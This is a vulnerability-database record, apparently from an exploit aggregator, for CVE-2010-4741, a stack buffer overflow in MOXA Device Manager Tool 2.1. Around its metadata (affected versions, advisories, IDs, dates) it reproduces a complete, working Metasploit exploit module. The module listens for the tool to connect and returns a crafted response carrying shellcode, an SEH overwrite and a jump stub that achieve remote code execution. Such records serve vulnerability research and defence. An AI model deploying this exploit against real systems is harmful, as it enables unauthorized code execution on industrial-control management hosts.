ID
VAR-E-201011-0390
CVE
| cve_id: | CVE-2010-4741 | Trust: 1.0 |
EDB ID
16381
TITLE
MOXA Device Manager Tool 2.1 - Remote Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
MOXA Device Manager Tool 2.1 - Remote Buffer Overflow (Metasploit). CVE-69027CVE-2010-4741 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | moxa | model: | device manager tool | scope: | eq | version: | 2.1 | Trust: 2.7 |
| vendor: | moxa | model: | device manager | scope: | eq | version: | 2.1 | Trust: 0.3 |
| vendor: | moxa | model: | device manager | scope: | ne | version: | 2.3 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'Ruben Santamarta', 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
],
'Privileged' => false,
'DisclosureDate' => 'Oct 20 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
sploit = rand_text_alpha_upper(18024)
sploit[0, 4] = [0x29001028].pack('V')
sploit[472, payload.encoded.length] = payload.encoded
sploit[1072, 8] = generate_seh_record(target.ret)
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
client.put(sploit)
handler(client)
service.close_client(client)
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Buffer Overflow (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-10-301-01A | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 16381 | Trust: 1.6 |
| db: | ICS CERT ALERT | id: | ICS-ALERT-10-293-02 | Trust: 1.4 |
| db: | NVD | id: | CVE-2010-4741 | Trust: 1.0 |
| db: | 0DAYTODAY | id: | 27389 | Trust: 0.6 |
| db: | EDBNET | id: | 92186 | Trust: 0.6 |
| db: | EDBNET | id: | 39074 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 95613 | Trust: 0.5 |
| db: | BID | id: | 46156 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2010-4741 | Trust: 1.0 |
| url: | https://0day.today/exploits/27389 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/16381/ | Trust: 0.6 |
| url: | http://www.us-cert.gov/control_systems/pdf/ics-alert-10-293-02.pdf | Trust: 0.3 |
| url: | http://www.moxa.com/product/moxa_device_manager.htm | Trust: 0.3 |
| url: | http://reversemode.com/index.php?option=com_content&task=view&id=70&itemid=1 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 46156 |
| db: | PACKETSTORM | id: | 95613 |
| db: | EXPLOIT-DB | id: | 16381 |
| db: | EDBNET | id: | 92186 |
| db: | EDBNET | id: | 39074 |
LAST UPDATE DATE
2022-07-27T09:38:24.143000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 46156 | date: | 2011-02-04T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 46156 | date: | 2011-02-04T00:00:00 |
| db: | PACKETSTORM | id: | 95613 | date: | 2010-11-08T23:55:46 |
| db: | EXPLOIT-DB | id: | 16381 | date: | 2010-11-14T00:00:00 |
| db: | EDBNET | id: | 92186 | date: | 2017-03-26T00:00:00 |
| db: | EDBNET | id: | 39074 | date: | 2010-11-14T00:00:00 |